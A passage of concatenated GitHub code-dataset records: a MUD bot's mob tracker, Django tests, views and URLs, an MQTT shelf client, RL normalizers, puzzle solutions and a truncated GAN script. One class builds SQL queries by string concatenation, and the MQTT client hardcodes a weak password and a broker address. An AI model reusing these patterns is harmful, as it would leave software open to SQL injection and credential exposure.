R.mob_attacked, R.you_attack, R.mob_aggro\n ]\n\n def __init__(self):\n self.list = ReferencingList([])\n self.attacking = []\n self.singles = ['a', 'an', 'the']\n self.numbers = [\n 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen',\n 'fourteen', 'fifteen' , 'sixteen', 'seventeen', 'eighteen', 'nineteen', 'twenty'\n ]\n self.numbers.extend([str(i) + \" \" for i in range(21, 200)])\n self.damage = []\n self.chase = ''\n self.chase_exit = ''\n\n def read_match(self, m):\n if m.group('mob1'):\n return m.group('mob1').strip()\n elif m.group('mob2'):\n # magentaprint(\"Mobs mob2\")\n if m.group('mob2').startswith('The '):\n return m.group('mob2').partition(' ')[2].strip()\n else:\n return m.group('mob2').strip()\n elif m.group('mob3'):\n # magentaprint(\"Mobs mob3\")\n return m.group('mob3').strip()\n\n def read_mobs(self, arrived_mobs):\n mob_parse = arrived_mobs.partition(' ')\n first_word = mob_parse[0].lower()\n\n if first_word in self.singles:\n return [mob_parse[2]]\n elif first_word in self.numbers:\n magentaprint(\"Mobs mobs: \" + arrived_mobs + \", first_word: \" + first_word)\n return [remove_plural(mob_parse[2])] * (int(self.numbers.index(first_word)) + 2)\n else:\n # Named mob\n magentaprint(\"Mobs arrived no article: first_word \" + first_word + \" mobs: \" + arrived_mobs)\n # self.list.append(mob_parse[0])\n return [mob_parse[0]]\n\n def notify(self, r, m_obj):\n # We'll let Cartography handle the initialization of monster_list with the area regex since it already does a great job.\n if r in R.mob_arrived:\n self.list.add_from_list(self.read_mobs(m_obj.group('mobs')))\n elif r in R.mob_died:\n if self.read_match(m_obj) in self.list:\n self.list.remove(self.read_match(m_obj))\n magentaprint(\"Mobs notify matched \" + str(self.read_match(m_obj)) + \" in self.attacking: \" + str(self.read_match(m_obj) in self.attacking) + \", self.attacking: \" + 
str(self.attacking))\n if self.read_match(m_obj) in self.attacking:\n self.attacking.remove(self.read_match(m_obj)) # TODO: if a mob is one-shot, it's not removed because the You attacked notify is after\n magentaprint('Mobs damage ' + str(self.damage) + ', s=' + str(sum(self.damage)) + ', m=' + str(round(self.mean(self.damage), 1)) + ', stdev=' + str(round(self.stdev(self.damage), 1)) + ', h=' + str(round(1 - sum([x == 0 for x in self.damage])/max(len(self.damage),1), 2)))\n # m = sum(self.damage) / max(len(self.damage), 1)\n # s = sum(self.damage - [m]*len(self.damage))\n # magentaprint('Mobs damage ' + str(self.damage) + ', s=' + str(sum(self.damage)) + ', m=' + str(stats.mean(self.damage)) + ', stdev=' + str(stats.stdev(self.damage)) + ', h=' + str(round(1 - sum([x == 0 for x in self.damage])/len(self.damage), 2)))\n elif r in R.mob_fled: # Leave mobs.attacking populated. (?) might help to chase mobs that don't block you (chase currently relies on that.)\n if self.read_match(m_obj) in self.list:\n self.list.remove(self.read_match(m_obj))\n self.chase = self.read_match(m_obj)\n self.chase_exit = m_obj.group('exit')\n elif (r in R.mob_wandered or r in R.mob_left) and self.read_match(m_obj) in self.list:\n self.list.remove(self.read_match(m_obj))\n elif r in R.mob_joined1 or r in R.mob_joined2:\n self.attacking.append(self.read_match(m_obj))\n elif r in R.mob_attacked:\n # c = self.attacking.count(m_obj.group('mob').strip())\n # if c == 0:\n # self.attacking.append(m_obj.group('mob'))\n # # Commenting incorrect code\n # # else:\n # # if m_obj.group('nth'):\n # # nth = int(m_obj.group('nth')[0:len(m_obj.group('nth'))-2])\n # # self.attacking.extend([m_obj.group('mob')] * max(nth - c, 0))\n c = self.attacking.count(self.read_match(m_obj))\n if c == 0:\n self.attacking.append(self.read_match(m_obj))\n # TODO: remember if 1st and 2nd mobs are attacking and ensure attacking has length 2 if necessary\n if 'd' in m_obj.groupdict().keys():\n self.damage.append(int(m_obj.group('d')))\n else:\n self.damage.append(0)\n if r in R.you_attack or r in R.mob_aggro:\n self.damage = []\n\n self.attacking.append(self.read_match(m_obj))\n magentaprint(\"mobs.list \" + str(self.list) + \"; notification from regex: \" + str(r[0:min(10, len(r))]))\n if self.attacking:\n magentaprint(\"mobs.attacking \" + str(self.attacking))\n super().notify(r, m_obj)\n\n def parse_mob_string(self, s):\n # You see (two kobold children, a dustman).\n # (Two lay followers) just arrived.\n s = s.replace(\"\\n\\r\", ' ')\n # comma_items = [comma_item.strip().lower() for comma_item in s.split(',')]\n\n # return [Mobs.remove_plural(m.strip()) for m in mob_match.group(1).split(',')]\n m_list = []\n # for c in comma_items:\n for comma_item in s.split(','):\n m = comma_item.strip().lower()\n\n if m[len(m)-4:len(m)-2] == ' (' and m[len(m)-1] == ')':\n # m = remove_good_evil(m)\n m = m[0:len(m)-4]\n\n if any(m.startswith(single + ' ') for single in self.singles):\n # m_dict[m.partition(' ')[2]] = 1\n m_list.extend([m.partition(' ')[2]])\n # number_check = [m.startswith(n) for n in numbers]\n elif any(m.startswith(n + ' ') for n in self.numbers):\n m_list.extend([remove_plural(m.partition(' ')[2])] * (self.numbers.index(m.split(' ')[0]) + 2))\n else:\n m_list.append(m)\n\n # for n in range(0, len(numbers)):\n # if c.startswith(numbers[n] + ' '):\n # # m_dict[m.partition(' ')[2]] = n + 2\n # c_singular = remove_plural(c)\n # m_list.extend([c_singular.partition(' ')[2]] * (n + 2))\n # break\n\n # return list(m_dict.keys())\n return 
m_list\n\n def mean(self, a):\n return sum(a)/max(len(a),1)\n\n def stdev(self, a):\n # stdev excluding zeroes\n m = self.mean(a)\n l = len(a) - sum([x==0 for x in a])\n # return math.sqrt(1/len(a) * sum([(x-m)^2 for x in a]))\n return math.sqrt(1/max(l,1) * sum([pow((x-m),2) for x in a]))\n\ndef remove_plural(m):\n # if mob_string.endswith('s'):\n # mob_string = mob_string[0:len(mob_string)-1]\n # elif mob_string.endswith('ses'):\n # mob_string = mob_string[0:len(mob_string)-3]\n # m = mob_string\n\n # if capitals:\n # singles = [s.title() for s in singles]\n # numbers = [n.title() for n in numbers]\n # else:\n # singles = [s.lower() for s in singles[0:2]]\n # singles.append('The ')\n # numbers = [n.lower() for n in numbers]\n\n # if any([m.startswith(s) for s in singles]):\n # # m_dict[m.partition(' ')[2]] = 1\n # return m.partition(' ')[2]\n # number_check = [m.startswith(n) for n in numbers]\n if m.endswith('sses'):\n return m[0:len(m)-2]\n elif m.endswith('s'):\n return m[0:len(m)-1]\n elif m.endswith('children'):\n return m[0:len(m)-3]\n elif m.endswith(' mice'):\n return m[0:len(m)-4] + 'mouse'\n else:\n return m\n\n # for n in range(0, len(numbers)):\n # if m.startswith(numbers[n]):\n # # m_dict[m.partition(' ')[2]] = n + 2\n # m_list.extend([m.partition(' ')[2]] * (n + 2))\n\ndef remove_good_evil(m):\n if m.lower().endswith(' (g)') or m.lower().endswith(' (e)'):\n return m[0:len(m)-5]\n","repo_name":"lbaribeau/los-helper","sub_path":"main/reactions/Mobs.py","file_name":"Mobs.py","file_ext":"py","file_size_in_byte":8863,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"4431119258","text":"def solution(name, yearning, photo):\n answer = []\n\n for one in photo:\n total_score = 0\n for person in one:\n if person in name:\n index = name.index(person)\n total_score += yearning[index]\n\n answer.append(total_score)\n\n return answer\n\n\nname = []\nyearing = []\nphoto = []\n\nprint(solution())\n","repo_name":"birdieHyun/Algorithm_Python","sub_path":"programmers/lv1/Memory.py","file_name":"Memory.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30243740557","text":"from Classes.SUDBConnect import SUDBConnect\nfrom Classes.CleanText import CleanText\nimport re\nimport time\n\n\nclass InsertIefaLeadArrayIntoIefaLeadsDB(object):\n def __init__(self, iefaLeadArray, fundingClassification, badScholarshipClassification):\n self.iefaLeadArray = iefaLeadArray\n self.fundingClassification = fundingClassification\n self.badScholarshipClassificaion = badScholarshipClassification\n self.db = SUDBConnect()\n self.fileSystemDB = SUDBConnect(destination='filesystem')\n\n self.name = self.iefaLeadArray[0]\n self.url = self.iefaLeadArray[1]\n self.url = CleanText.replaceSingleQuotesWithTwoSingleQuotes(self.url)\n self.sponsor = self.iefaLeadArray[2]\n self.submissionDeadline = self.iefaLeadArray[3]\n self.majors = self.iefaLeadArray[4]\n self.amount = self.iefaLeadArray[5]\n self.description = self.iefaLeadArray[6]\n self.otherCriteria = self.iefaLeadArray[7]\n self.numberAwards = self.iefaLeadArray[8]\n self.hostInstitution = self.iefaLeadArray[9]\n self.includes = self.iefaLeadArray[10]\n self.nationalityRequired = self.iefaLeadArray[11]\n self.hostCountries = self.iefaLeadArray[12]\n self.sourceWebsite = self.iefaLeadArray[13]\n self.sourceText = self.iefaLeadArray[14]\n self.date = time.strftime('%Y%m%d')\n\n def writeFileToDisk(self):\n 
tableName = 'IefaLeads'\n user = 'Kya'\n website = re.sub('Leads', '', tableName)\n columns = self.db.getColumnNamesFromTable(tableName)\n currentRow = self.db.getRowsDB(\n \"select * from dbo.IefaLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")[0]\n self.fileSystemDB.writeFile(columns, currentRow, user, website, self.url, self.date)\n\n def checkIfAlreadyInDatabase(self):\n matchingRow = self.db.getRowsDB(\n \"select * from dbo.IefaLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n if matchingRow != []:\n return True\n else:\n return False\n\n def insertUpdateLead(self):\n if not self.checkIfAlreadyInDatabase():\n self.db.insertUpdateOrDeleteDB(\n \"INSERT INTO dbo.IefaLeads (Name, Url, Sponsor, SubmissionDeadline, Majors, Amount, Description, OtherCriteria, NumberAwards, HostInstitution, Includes, NationalityRequired, HostCountries, SourceWebsite, SourceText, Date, Tag, BadScholarship) VALUES (N'\" + self.name + \"', N'\" + self.url + \"', N'\" + self.sponsor + \"', N'\" + self.submissionDeadline + \"', N'\" + self.majors + \"', N'\" + self.amount + \"', N'\" + self.description + \"', N'\" + self.otherCriteria + \"', N'\" + self.numberAwards + \"', N'\" + self.hostInstitution + \"', N'\" + self.includes + \"', N'\" + self.nationalityRequired + \"', N'\" + self.hostCountries + \"', N'\" + self.sourceWebsite + \"', N'\" + self.sourceText + \"', '\" + self.date + \"', '\" + self.fundingClassification + \"', '\" + self.badScholarshipClassificaion + \"')\")\n self.writeFileToDisk()\n else:\n self.db.insertUpdateOrDeleteDB(\n \"update dbo.IefaLeads set Sponsor=N'\" + self.sponsor + \"', SubmissionDeadline=N'\" + self.submissionDeadline + \"', Majors=N'\" + self.majors + \"', Amount=N'\" + self.amount + \"', Description=N'\" + self.description + \"', OtherCriteria=N'\" + self.otherCriteria + \"', NumberAwards=N'\" + self.numberAwards + \"', HostInstitution=N'\" + self.hostInstitution + \"', Includes=N'\" + self.includes + \"', NationalityRequired=N'\" + self.nationalityRequired + \"', HostCountries=N'\" + self.hostCountries + \"', SourceWebsite=N'\" + self.sourceWebsite + \"', SourceText=N'\" + self.sourceText + \"', Date='\" + self.date + \"', Tag='\" + self.fundingClassification + \"', BadScholarship='\" + self.badScholarshipClassificaion + \"' where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n self.writeFileToDisk()\n","repo_name":"kyajpauley/cerebro","sub_path":"Classes/InsertIefaLeadArrayIntoIefaLeadsDB.py","file_name":"InsertIefaLeadArrayIntoIefaLeadsDB.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23753558830","text":"from decimal import Decimal\nimport os\nfrom unittest.mock import patch\nfrom hashlib import sha512\n\nimport pytest\n\nfrom model_bakery import baker\n\nfrom booking.models import Membership, Booking, GiftVoucher\nfrom ..models import Invoice, Seller, StripePaymentIntent, StripeRefund\n\npytestmark = pytest.mark.django_db\n\n\ndef test_invoice_str():\n invoice = baker.make(Invoice, username=\"test@test.com\", invoice_id=\"foo123\", amount=\"10\")\n assert str(invoice) == \"foo123 - test@test.com - £10\"\n assert invoice.date_paid is None\n invoice.paid = True\n invoice.save()\n assert str(invoice) == \"foo123 - test@test.com - £10 (paid)\"\n assert invoice.date_paid is not None\n\n\n@patch(\"stripe_payments.models.ShortUUID.random\")\ndef test_generate_invoice_id(short_uuid_random):\n 
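The InsertIefaLeadArrayIntoIefaLeadsDB.py record above builds its INSERT and UPDATE statements by string concatenation and escapes quotes by hand; a minimal sqlite3 sketch of the parameterized alternative, with an illustrative mini schema:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE IefaLeads (Name TEXT, Url TEXT, Sponsor TEXT)")
row = ("O'Brien Scholarship", "https://example.org/lead", "Example Sponsor")
# placeholders let the driver handle quoting, so "O'Brien" needs no doubling
conn.execute("INSERT INTO IefaLeads (Name, Url, Sponsor) VALUES (?, ?, ?)", row)
print(conn.execute("SELECT Name FROM IefaLeads").fetchone())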
short_uuid_random.side_effect = [\"foo123\", \"foo234\", \"foo567\"]\n # inv id generated from random shortuuid\n assert Invoice.generate_invoice_id() == \"foo123\"\n\n # if an invoice already exists with that id, try again until we get a unique one\n baker.make(Invoice, invoice_id=\"foo234\")\n assert Invoice.generate_invoice_id() == \"foo567\"\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_signature():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n assert invoice.signature() == sha512(\"foo123test\".encode(\"utf-8\")).hexdigest()\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_item_count():\n invoice = baker.make(\n Invoice, invoice_id=\"foo123\",\n memberships=baker.make(Membership, _quantity=2),\n bookings=baker.make(Booking, _quantity=1),\n gift_vouchers=baker.make(GiftVoucher, gift_voucher_type__discount_amount=10, _quantity=1),\n )\n assert invoice.item_count() == 4\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_items_metadata():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n membership = baker.make(Membership, membership_type__cost=10, membership_type__name=\"test membership\", invoice=invoice)\n booking = baker.make(Booking, event__name=\"test event\", event__cost=10, invoice=invoice)\n gift_voucher = baker.make(GiftVoucher, gift_voucher_type__discount_amount=10, invoice=invoice)\n \n assert invoice.items_metadata() == {\n f'booking_{booking.id}_cost_in_p': '1000',\n f'booking_{booking.id}_item': str(booking.event),\n f'gift_voucher_{gift_voucher.id}_cost_in_p': '1000',\n f'gift_voucher_{gift_voucher.id}_item': 'Gift Voucher: £10.00',\n f'membership_{membership.id}_cost_in_p': '1000',\n f'membership_{membership.id}_item': f'test membership - {membership.month_str} {membership.year}'}\n\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_items_summary():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n membership = baker.make(Membership, membership_type__cost=10, membership_type__name=\"test membership\", invoice=invoice)\n booking = baker.make(Booking, event__name=\"test event\", event__cost=10, invoice=invoice)\n gift_voucher = baker.make(\n GiftVoucher, gift_voucher_type__event_type=\"private\", \n gift_voucher_type__override_cost=Decimal(10), invoice=invoice\n )\n\n assert invoice.items_summary() == {\n \"bookings\": [str(booking.event)],\n \"memberships\": [str(membership)],\n \"gift_vouchers\": [str(gift_voucher)]\n }\n\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_item_types():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n baker.make(Membership, membership_type__cost=10, membership_type__name=\"test membership\", invoice=invoice)\n baker.make(Booking, event__name=\"test event\", event__cost=10, invoice=invoice)\n baker.make(GiftVoucher, gift_voucher_type__discount_amount=10, invoice=invoice)\n\n assert invoice.item_types() == [\"memberships\", \"bookings\", \"gift_vouchers\"]\n\n\ndef test_seller_str():\n seller = baker.make(Seller, user__email=\"testuser@test.com\")\n assert str(seller) == \"testuser@test.com\"\n\n\ndef test_create_stripe_payment_intent_instance_from_pi(get_mock_payment_intent):\n payment_intent = get_mock_payment_intent()\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n assert not StripePaymentIntent.objects.exists()\n pi, created = StripePaymentIntent.update_or_create_payment_intent_instance(payment_intent, invoice)\n assert created\n assert StripePaymentIntent.objects.count() == 1\n assert pi.invoice == invoice\n assert 
pi.seller is None\n\n # update with seller\n seller = baker.make(Seller, user__email=\"testuser@test.com\")\n pi, created = StripePaymentIntent.update_or_create_payment_intent_instance(payment_intent, invoice, seller=seller)\n assert not created\n assert StripePaymentIntent.objects.count() == 1\n assert pi.seller == seller\n\n\ndef test_stripe_payment_intent_str(get_mock_payment_intent):\n payment_intent = get_mock_payment_intent()\n invoice = baker.make(Invoice, invoice_id=\"foo123\", username=\"user@test.com\")\n pi, _ = StripePaymentIntent.update_or_create_payment_intent_instance(payment_intent, invoice)\n assert str(pi) == \"mock-intent-id - invoice foo123 - user@test.com\"\n\n\ndef test_create_stripe_refund_instance_from_refund_obj_and_pi_instance(get_mock_payment_intent, get_mock_refund):\n payment_intent_from_stripe = get_mock_payment_intent()\n refund_from_stripe = get_mock_refund()\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n seller = baker.make(Seller, user__email=\"testuser@test.com\")\n pi, _ = StripePaymentIntent.update_or_create_payment_intent_instance(\n payment_intent_from_stripe, invoice, seller=seller\n )\n \n refund = StripeRefund.create_from_refund_obj(\n refund=refund_from_stripe, payment_intent_model_instance=pi, booking_id=1\n )\n assert refund.booking_id == 1\n assert refund.refund_id == \"mock-refund-id\"\n assert refund.amount == 800\n assert refund.invoice == invoice\n assert refund.seller == seller\n","repo_name":"rebkwok/sunshine","sub_path":"stripe_payments/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29776796907","text":"\"\"\"BOOKAPP URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom .views import create_book,list_all_book,delete_book,update_book,Registration,login_todo,django_logout\n\nurlpatterns = [\n path(\"create\",create_book,name=\"create\"),\n path(\"list\",list_all_book,name=\"listbook\"),\n path(\"delete/\",delete_book,name=\"delete\"),\n path(\"edit/\",update_book,name=\"update\"),\n path(\"registeration\",Registration,name=\"register\"),\n path(\"login\",login_todo,name=\"loginview\"),\n path(\"logout\",django_logout,name=\"logoutview\"),\n\n\n]\n","repo_name":"bibinbm98/bookapp-django","sub_path":"book/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33223727854","text":"import paho.mqtt.client as mqtt\nimport sys\nimport time\nimport smbus2\nfrom RPLCD.i2c import CharLCD\n\nsys.modules['smbus'] = smbus2\n\nuser = 'iot2020'\npassword = '123456'\n\nhost = \"35.233.225.236\"\nid_dict = {'orange' : 'Xlwra2HLExjGArkgxtcl', 'apple' : 'ioTrUrnFNWR6pO0pJtIq'}\n\nclass mqtt_class(object):\n\n lock = True\n price = 0\n client = mqtt.Client()\n lcd = CharLCD('PCF8574', address=0x27, port=1, backlight_enabled=True)\n\n def __init__(self, name):\n\n self.name = name\n self.ID = id_dict[self.name]\n self.client.on_connect = self.on_connect\n self.client.on_message = self.on_message\n self.client.username_pw_set(user, password)\n self.client.connect(host, 1883, 120)\n self.client.loop_start()\n\n def on_connect(self, client, userdata, flags, rc):\n print(\"Client connected with result code: {}\".format(str(rc)))\n self.client.subscribe([(self.ID + '/open', 2), (self.ID + '/price', 2)])\n\n def on_message(self, client, userdata, msg):\n # Enable lid or Set price\n if int(msg.payload) == 1:\n self.lock = False\n else:\n self.price = int(msg.payload)\n print('[ACT] Price is :' + str(self.price))\n self.lcd.clear()\n self.lcd.cursor_pos = (0, 0)\n self.lcd.write_string('Item: ' + self.name)\n self.lcd.cursor_pos = (1, 0)\n self.lcd.write_string('Price: ' + str(self.price))\n\n def take_goods(self):\n self.client.publish(self.ID + \"/take\", \"fuck\", qos=2, retain=False)\n print('[ACT] Goods taken')\n\n def close_lid(self):\n self.client.publish(self.ID + \"/close\", \"1\", qos=2, retain=False)\n print('[Act] Close lid')\n \n def shut_down(self): \n self.lcd.clear()\n self.client.disconnect()\n\n","repo_name":"DaDa0413/IoT-Shelf","sub_path":"utils/mqtt_lib.py","file_name":"mqtt_lib.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35056306579","text":"from typing import Dict, Tuple, Union\n\nimport numpy as np\nimport torch as th\n\nimport yadrl.common.types as t\nfrom yadrl.common.ops import to_numpy, to_tensor\nfrom yadrl.common.running_mean_std import RunningMeanStd\n\n\nclass DummyNormalizer:\n def __init__(self, **kwargs):\n pass\n\n def __call__(\n self, batch_input: t.TData, device: th.device = th.device(\"cpu\")\n ) -> t.TData:\n return batch_input\n\n def update(self, batch_input):\n pass\n\n def load(self, state_dict: Dict[str, Union[np.ndarray, int]]):\n pass\n\n def state_dict(self) -> Dict[str, Union[np.ndarray, int]]:\n state_dict = {}\n return state_dict\n\n\nclass RMSNormalizer(DummyNormalizer):\n def __init__(\n self,\n dim: Tuple[int, ...],\n clip_min: float = -5.0,\n 
clip_max: float = 5.0,\n **kwargs\n ):\n super().__init__(**kwargs)\n self._rms = RunningMeanStd(dim)\n self._clip = (clip_min, clip_max)\n\n def __call__(\n self, batch_input: t.TData, device: th.device = th.device(\"cpu\")\n ) -> t.TData:\n mean, std = self._rms()\n if isinstance(batch_input, th.Tensor):\n th_mean = to_tensor(mean, device)\n th_std = to_tensor(std, device)\n return th.clamp((batch_input - th_mean) / th_std, *self._clip)\n return np.clip(batch_input - mean / std, *self._clip)\n\n def update(self, batch_input: t.TData):\n if isinstance(batch_input, th.Tensor):\n self._rms.update(to_numpy(batch_input))\n else:\n self._rms.update(batch_input)\n\n def load(self, state_dict: Dict[str, Union[np.ndarray, int]]):\n mean = state_dict[\"mean\"]\n variance = state_dict[\"variance\"]\n count = state_dict[\"count\"]\n self._rms.set_parameters(mean, variance, count)\n\n def state_dict(self) -> Dict[str, Union[np.ndarray, int]]:\n state_dict = {\n \"mean\": self._rms.mean,\n \"variance\": self._rms.variance,\n \"count\": self._rms.count,\n }\n return state_dict\n\n\nclass ScaleNormalizer(DummyNormalizer):\n def __init__(\n self,\n target_min: np.ndarray,\n target_max: np.ndarray,\n source_min: np.ndarray,\n source_max: np.ndarray,\n **kwargs\n ):\n super().__init__(**kwargs)\n self._t_min = target_min\n self._t_max = target_max\n self._s_min = source_min\n self._s_max = source_max\n\n def __call__(\n self,\n batch_input: Union[np.ndarray, th.Tensor],\n device: th.device = th.device(\"cpu\"),\n ) -> t.TData:\n t_min = self._t_min\n t_max = self._t_max\n s_min = self._s_min\n s_max = self._s_max\n if isinstance(batch_input, th.Tensor):\n t_min = to_tensor(t_min, device)\n t_max = to_tensor(t_max, device)\n s_min = to_tensor(s_min, device)\n s_max = to_tensor(s_max, device)\n return (batch_input - s_min) / (s_max - s_min) * (t_max - t_min) + t_min\n\n\nclass ImageNormalizer(DummyNormalizer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self._scale_factor = 1.0 / 256.0\n\n def __call__(\n self, batch_input: t.TData, device: th.device = th.device(\"cpu\")\n ) -> t.TData:\n return batch_input * self._scale_factor\n","repo_name":"gbartyzel/yadrl","sub_path":"yadrl/common/normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20437383214","text":"from util import *\n\n\n@click.group()\ndef cli():\n pass\n\n\ndef process_line(line):\n return list(map(int, line.split(\",\")))\n\n\ndef rfind(l, e):\n for i in range(len(l) - 1, -1, -1):\n if l[i] == e:\n return i\n raise ValueError(\"oops\")\n\n\n@cli.command()\n@click.argument(\"input\", type=click.File())\n@click.argument(\"pos\", type=int)\ndef part1(input, pos):\n data = [process_line(l) for l in read_file(input)][0]\n for i in range(len(data), pos):\n last = data[-1]\n try:\n b = rfind(data[:-1], last)\n data.append(i - b - 1)\n except:\n data.append(0)\n print(data[-1])\n\n\n@cli.command()\n@click.argument(\"input\", type=click.File())\n@click.argument(\"pos\", type=int)\ndef part2(input, pos):\n data = [process_line(l) for l in read_file(input)][0]\n prev_ind = {k: i for (i, k) in enumerate(data)}\n\n last = data[-1]\n last_ind = -1\n\n for i in range(len(data), pos):\n if last_ind < 0:\n last = 0\n else:\n last = i - last_ind - 1\n\n last_ind = prev_ind.get(last, -1)\n prev_ind[last] = i\n\n print(last)\n\n\n@cli.command()\n@click.argument(\"input\", 
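A self-contained NumPy sketch of the clipped z-score normalization that RMSNormalizer in the normalizer.py record above delegates to its RunningMeanStd; batch moments are merged with the parallel-variance formula (illustrative, not the repository's class):

import numpy as np

class SimpleRMSNormalizer:
    def __init__(self, dim, clip=(-5.0, 5.0)):
        self.mean, self.var, self.count = np.zeros(dim), np.ones(dim), 1e-4
        self.clip = clip

    def update(self, batch):
        # merge batch moments into the running moments (parallel variance)
        b_mean, b_var, b_n = batch.mean(0), batch.var(0), batch.shape[0]
        delta, tot = b_mean - self.mean, self.count + b_n
        self.mean = self.mean + delta * b_n / tot
        m2 = self.var * self.count + b_var * b_n + delta**2 * self.count * b_n / tot
        self.var, self.count = m2 / tot, tot

    def __call__(self, x):
        return np.clip((x - self.mean) / np.sqrt(self.var + 1e-8), *self.clip)

norm = SimpleRMSNormalizer(dim=3)
data = np.random.randn(128, 3) * 10.0 + 5.0
norm.update(data)
print(norm(data).mean(0).round(2), norm(data).std(0).round(2))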
type=click.File())\n@click.argument(\"pos\", type=int)\ndef part3(input, pos):\n data = [process_line(l) for l in read_file(input)][0]\n\n prev_ind = defaultdict(list)\n for i, k in enumerate(data):\n prev_ind[k].append(i)\n\n num = data[-1]\n for i in range(len(data), pos):\n indices = prev_ind[num]\n\n if len(indices) < 2:\n num = 0\n else:\n num = indices[-1] - indices[-2]\n\n prev_ind[num].append(i)\n\n print(num)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"astonm/advent-of-code-2020","sub_path":"day15/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36616035830","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom .forms import ContatoModelForm\nfrom .models import Contato\n\ndef index(request):\n if str(request.method) == 'POST':\n form = ContatoModelForm(request.POST, request.FILES)\n if form.is_valid():\n\n form.save()\n\n messages.success(request, 'Contato salvo com sucesso.')\n form = ContatoModelForm()\n else:\n messages.error(request, 'Erro ao salvar Contato.')\n else:\n form = ContatoModelForm()\n context = {\n 'form': form\n }\n return render(request, 'index.html', context)\n\ndef error404(request,Exception):\n template = loader.get_template('404.html')\n return HttpResponse(content=template.render(), content_type='text/html; charset=utf8', status=404)\n\n\ndef error500(request, Exception):\n template = loader.get_template('500.html')\n return HttpResponse(content=template.render(), content_type='text/html; charset=utf8', status=500)\n\ndef contato(request):\n if str(request.user) != 'AnonymousUser':\n if str(request.method) == 'POST':\n form = ContatoModelForm(request.POST, request.FILES)\n if form.is_valid():\n\n form.save()\n\n messages.success(request, 'Contato salvo com sucesso.')\n form = ContatoModelForm()\n else:\n messages.error(request, 'Erro ao salvar Contato.')\n else:\n form = ContatoModelForm()\n context = {\n 'form': form\n }\n return render(request, 'contato.html', context)\n else:\n return redirect('index')","repo_name":"jerickleandro/d3club","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24497674698","text":"#############\n# Libraries #\n#############\n\nfrom helpers import process_image, load_generator, show_results\nimport numpy as np\nimport argparse\nimport torch\ntorch.manual_seed(7)\nnp.random.seed(5)\n\nMODEL_PATH = '../model/GAN_checkpoint.pth'\nimg_size = 128\ng_conv_dims = 128\nn_res_blocks = 10\n\n# set parser parameters\nparser = argparse.ArgumentParser('This program allow you to convert human faces into cartoon ones and vise versa.')\nparser.add_argument('-i', '--image', type = str, default = 'None', help = 'Image name.')\nparser.add_argument('-c', '--convert', type = str, default = 'human', help = 'Indicates to which type of image to convert (human or cartoon). Default value is set to human.')\nparser.add_argument('-f', '--filenames', type = str, default = 'image', help = 'Save name used for the resulting images (comparison and new image). 
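The part2/part3 solutions in the day15 code.py record above replace part1's backwards rfind scan with a last-seen index, making each step O(1); a compact standalone version of that memory game:

def memory_game(seed, n):
    # last_seen[v] = most recent 1-based turn on which v was spoken,
    # excluding the latest spoken number
    last_seen = {v: i + 1 for i, v in enumerate(seed[:-1])}
    last = seed[-1]
    for turn in range(len(seed), n):
        nxt = turn - last_seen[last] if last in last_seen else 0
        last_seen[last] = turn
        last = nxt
    return last

print(memory_game([0, 3, 6], 2020))  # 436, the puzzle's worked example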
